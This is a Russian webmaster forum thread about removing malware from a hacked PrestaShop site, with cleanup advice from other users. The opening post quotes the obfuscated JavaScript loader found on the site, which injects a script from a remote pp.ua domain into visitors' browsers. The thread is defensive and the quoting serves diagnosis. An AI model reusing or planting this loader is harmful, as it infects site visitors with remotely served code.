- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Всем доброго времени суток!
Поймал на сайте вирусню. Сайт на Престе. При загрузке страницы происходит подгрузка зараженного *.js файла и отправка данных на *.pp.ua сайт (постоянно меняется имя домена но всегда на регионе pp.ua). Удаляю этот файл через фтп, все становиться нормально, но через опред время картина повторяется и этот *.js файл появляется в другой папке и уже с другим названией.
Иногда меняется код в этом файле. И дата создания файла становится прошлым годом.
Вот пример:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 n(c){p(9.e&&9.k){4 i=9.k(\'10\')[0];4 7=9.e(\'1k\');7.j(\'1h\',\'1g/1n\');7.j(\'c\',c);i.K(7)}}6 r(5){b 5.g("I")==-1}4 V="&}1i#`-#~`O";4 W="Q;E{H$t%~";4 z="%3%N$U./:,M;)L> P*";4 R="*$$T]S(d,]J^B?$A]";4 C="2.*G>x*D";6 l(5){b 5.g(a)!=-1}4 F=")2:}y*#h[:?q)1f";4 1e="/(8%1c?;";4 1d=" 8/X]1m@1l?s";4 1j="^1b{U<1a~(<;0%;";4 12="11^/<,v*[Y^w~Z@";6 m(){b u.13()}4 o="14://19.18.5/17";4 a="a";6 f(){4 5=u.15.16();p(r(5)&&l(5)&&m()){n(o)}}f();',62,86,'||||var|ua|function|script_tag||document|win|return|src||createElement|includeCounter|indexOf||head_tag|setAttribute|getElementsByTagName|isWin|cond3|includeJavascript|url|if||notChrome|||navigator|||L8e||UBaCgDSx2|Kx_|r6h|UBaCgDSx4|Cz|_kCu|xNIeDzTx0||wcx|chrome|nmjl_|appendChild|QJh|_c|pH0|df0i|Uo||UBaCgDSx3|g6|zv||UBaCgDSx0|UBaCgDSx1|ZH5c7_|Evg|W2n|head|B1t|xNIeDzTx4|javaEnabled|http|userAgent|toLowerCase|12cb391bfe0e8937aaa86deb72a68|pp|ezoxal|WlBJ4Z|Dae8NC|NwwD|xNIeDzTx2|xNIeDzTx1|7W|text|type|0h|xNIeDzTx3|script|q8E|H5|javascript'.split('|'),0,{}))Подскажите плиз порядок действий по борьбе с вирусней.
Всем спасибо за ответы!
Не пользоваться файловыми менеджерами, ограничить доступ по ip, сменить все пароли.
проверьте ай-болитом на предмет шеллов, затем меняйте все пароли
проверьте ай-болитом на предмет шеллов, затем меняйте все пароли
проверил вебером и авастом, нашел пару стремных php файлов на сайте, удалил (уже неделю назад) но ничего не поменялось. Пароли сменил сразу.
Так понял, что он скрипт подгружает с другого сервака, вот как узнать где это прописано...
проверил вебером и авастом, нашел пару стремных php файлов на сайте, удалил (уже неделю назад) но ничего не поменялось. Пароли сменил сразу.
Так понял, что он скрипт подгружает с другого сервака, вот как узнать где это прописано...
а...понял про что. Запустил...долго он вообще втыкает?
долго если сервер медленный и файлов много. надеюсь через ssh его запустили?
после удаления дряни с хоста, обязательно установите все заплатки на cms.
долго если сервер медленный и файлов много. надеюсь через ssh его запустили?
после удаления дряни с хоста, обязательно установите все заплатки на cms.
файлов больше 11гигов...минут 15 всё прошло, через экспресс проверку (.php, .html, .htaccess), нашло кучу фигни...сижу ломаю голову что с этим делать дальше... а доступа к ssh у меня нет.
Спс за совет! Только если бы я еще знал где взять заплатки на Престашоп, какие и как их ставить))
Восстановить из бэкапа чистые БД и файлы и следить за изменениями файлов.
Подскажите плиз порядок действий по борьбе с вирусней.
Определить через что был взломан (заражен) сайт. Обычно это либо уязвимость в CMS сайта, либо утекшие пароли от админки, фтп и т.п. Реже это уязвимости в серверном ПО. Анализировать логи. Закрывать узявимость.
Универсальные советы:
Сменить все пароли (фтп, админка, скл и т.д.) и как уже советовали выше ограничить доступ к критичным элементам по IP.
Ограничить доступ к файлам(только чтение) для пользователя из-под которого работает сайт.
Не могу найти php файл, который втыкает (и формирует) данный js скрипт в страницы сайта.
ТС все сканеры ищут максимум самое популярное, поэтому зараза может остаться на вашем хосте, необходимо проверять каждый файл вашего сайта.